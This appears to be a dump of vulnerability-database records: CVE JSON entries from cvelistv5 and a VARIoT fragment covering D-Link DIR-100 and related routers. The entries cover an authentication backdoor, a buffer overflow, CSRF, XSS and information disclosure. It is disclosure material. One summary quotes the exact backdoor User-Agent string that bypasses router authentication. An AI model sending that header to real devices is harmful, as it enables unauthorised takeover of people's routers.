      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01478"
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "65290"
      },
      {
        "date": "2020-02-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007142"
      },
      {
        "date": "2014-02-03T23:36:22",
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "date": "2020-02-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-035"
      },
      {
        "date": "2020-02-04T14:15:12.340000",
        "db": "NVD",
        "id": "CVE-2013-7054"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01478"
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "65290"
      },
      {
        "date": "2020-02-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007142"
      },
      {
        "date": "2022-07-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-035"
      },
      {
        "date": "2024-11-21T02:00:14.943000",
        "db": "NVD",
        "id": "CVE-2013-7054"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-035"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link\u00a0DIR-100\u00a0 Vulnerable to cross-site scripting",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007142"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-035"
      }
    ],
    "trust": 0.6
  }
}

cve-2013-6026
Vulnerability from cvelistv5
Published
2013-10-19 10:00
Modified
2024-09-16 23:50
Severity ?
Summary
The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:29:42.729Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.dlink.com/uk/en/support/security"
          },
          {
            "name": "VU#248083",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/248083"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-10-19T10:00:00Z",
        "orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
        "shortName": "certcc"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.dlink.com/uk/en/support/security"
        },
        {
          "name": "VU#248083",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/248083"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cert@cert.org",
          "ID": "CVE-2013-6026",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/",
              "refsource": "MISC",
              "url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
            },
            {
              "name": "http://www.dlink.com/uk/en/support/security",
              "refsource": "CONFIRM",
              "url": "http://www.dlink.com/uk/en/support/security"
            },
            {
              "name": "VU#248083",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/248083"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
    "assignerShortName": "certcc",
    "cveId": "CVE-2013-6026",
    "datePublished": "2013-10-19T10:00:00Z",
    "dateReserved": "2013-10-04T00:00:00Z",
    "dateUpdated": "2024-09-16T23:50:32.878Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2013-6027
Vulnerability from cvelistv5
Published
2013-10-19 10:00
Modified
2024-09-16 22:46
Severity ?
Summary
Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi.
References
http://pastebin.com/raw.php?i=vbiG42VD (x_refsource_MISC)
http://www.kb.cert.org/vuls/id/248083 (third-party-advisory, x_refsource_CERT-VN)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:29:42.706Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://pastebin.com/raw.php?i=vbiG42VD"
          },
          {
            "name": "VU#248083",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/248083"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-10-19T10:00:00Z",
        "orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
        "shortName": "certcc"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://pastebin.com/raw.php?i=vbiG42VD"
        },
        {
          "name": "VU#248083",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/248083"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cert@cert.org",
          "ID": "CVE-2013-6027",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://pastebin.com/raw.php?i=vbiG42VD",
              "refsource": "MISC",
              "url": "http://pastebin.com/raw.php?i=vbiG42VD"
            },
            {
              "name": "VU#248083",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/248083"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
    "assignerShortName": "certcc",
    "cveId": "CVE-2013-6027",
    "datePublished": "2013-10-19T10:00:00Z",
    "dateReserved": "2013-10-04T00:00:00Z",
    "dateUpdated": "2024-09-16T22:46:38.010Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2013-7051
Vulnerability from cvelistv5
Published
2020-02-04 13:46
Modified
2024-08-06 17:53
Severity ?
Summary
D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:53:46.104Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/31425"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.securityfocus.com/bid/65290"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-02-04T13:46:03",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.exploit-db.com/exploits/31425"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.securityfocus.com/bid/65290"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-7051",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt",
              "refsource": "MISC",
              "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
            },
            {
              "name": "http://www.exploit-db.com/exploits/31425",
              "refsource": "MISC",
              "url": "http://www.exploit-db.com/exploits/31425"
            },
            {
              "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904",
              "refsource": "MISC",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
            },
            {
              "name": "https://www.securityfocus.com/bid/65290",
              "refsource": "MISC",
              "url": "https://www.securityfocus.com/bid/65290"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-7051",
    "datePublished": "2020-02-04T13:46:03",
    "dateReserved": "2013-12-11T00:00:00",
    "dateUpdated": "2024-08-06T17:53:46.104Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2013-7055
Vulnerability from cvelistv5
Published
2020-02-04 13:56
Modified
2024-08-06 17:53
Severity ?
Summary
D-Link DIR-100 4.03B07 has PPTP and poe information disclosure
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:53:45.861Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.securityfocus.com/bid/65290/info"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "D-Link DIR-100 4.03B07 has PPTP and poe information disclosure"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-02-04T13:56:49",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.securityfocus.com/bid/65290/info"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-7055",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "D-Link DIR-100 4.03B07 has PPTP and poe information disclosure"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt",
              "refsource": "MISC",
              "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
            },
            {
              "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903",
              "refsource": "MISC",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
            },
            {
              "name": "https://www.securityfocus.com/bid/65290/info",
              "refsource": "MISC",
              "url": "https://www.securityfocus.com/bid/65290/info"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-7055",
    "datePublished": "2020-02-04T13:56:49",
    "dateReserved": "2013-12-11T00:00:00",
    "dateUpdated": "2024-08-06T17:53:45.861Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2013-7052
Vulnerability from cvelistv5
Published
2020-02-04 13:49
Modified
2024-08-06 17:53
Severity ?
Summary
D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:53:46.075Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.securityfocus.com/bid/65290"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-02-04T13:49:19",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.securityfocus.com/bid/65290"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-7052",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt",
              "refsource": "MISC",
              "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
            },
            {
              "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902",
              "refsource": "MISC",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
            },
            {
              "name": "https://www.securityfocus.com/bid/65290",
              "refsource": "MISC",
              "url": "https://www.securityfocus.com/bid/65290"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-7052",
    "datePublished": "2020-02-04T13:49:19",
    "dateReserved": "2013-12-11T00:00:00",
    "dateUpdated": "2024-08-06T17:53:46.075Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2013-7053
Vulnerability from cvelistv5
Published
2020-02-04 13:51
Modified
2024-08-06 17:53
Severity ?
Summary
D-Link DIR-100 4.03B07: cli.cgi CSRF
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:53:45.879Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.securityfocus.com/bid/65290/info"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "D-Link DIR-100 4.03B07: cli.cgi CSRF"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-02-04T13:51:27",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.securityfocus.com/bid/65290/info"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-7053",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "D-Link DIR-100 4.03B07: cli.cgi CSRF"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt",
              "refsource": "MISC",
              "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
            },
            {
              "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905",
              "refsource": "MISC",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
            },
            {
              "name": "https://www.securityfocus.com/bid/65290/info",
              "refsource": "MISC",
              "url": "https://www.securityfocus.com/bid/65290/info"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-7053",
    "datePublished": "2020-02-04T13:51:27",
    "dateReserved": "2013-12-11T00:00:00",
    "dateUpdated": "2024-08-06T17:53:45.879Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2013-7054
Vulnerability from cvelistv5
Published
2020-02-04 13:54
Modified
2024-08-06 17:53
Severity ?
Summary
D-Link DIR-100 4.03B07: cli.cgi XSS
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:53:45.856Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.securityfocus.com/bid/65290/info"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "D-Link DIR-100 4.03B07: cli.cgi XSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-02-04T13:54:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.securityfocus.com/bid/65290/info"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-7054",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "D-Link DIR-100 4.03B07: cli.cgi XSS"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt",
              "refsource": "MISC",
              "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
            },
            {
              "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906",
              "refsource": "MISC",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
            },
            {
              "name": "https://www.securityfocus.com/bid/65290/info",
              "refsource": "MISC",
              "url": "https://www.securityfocus.com/bid/65290/info"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-7054",
    "datePublished": "2020-02-04T13:54:00",
    "dateReserved": "2013-12-11T00:00:00",
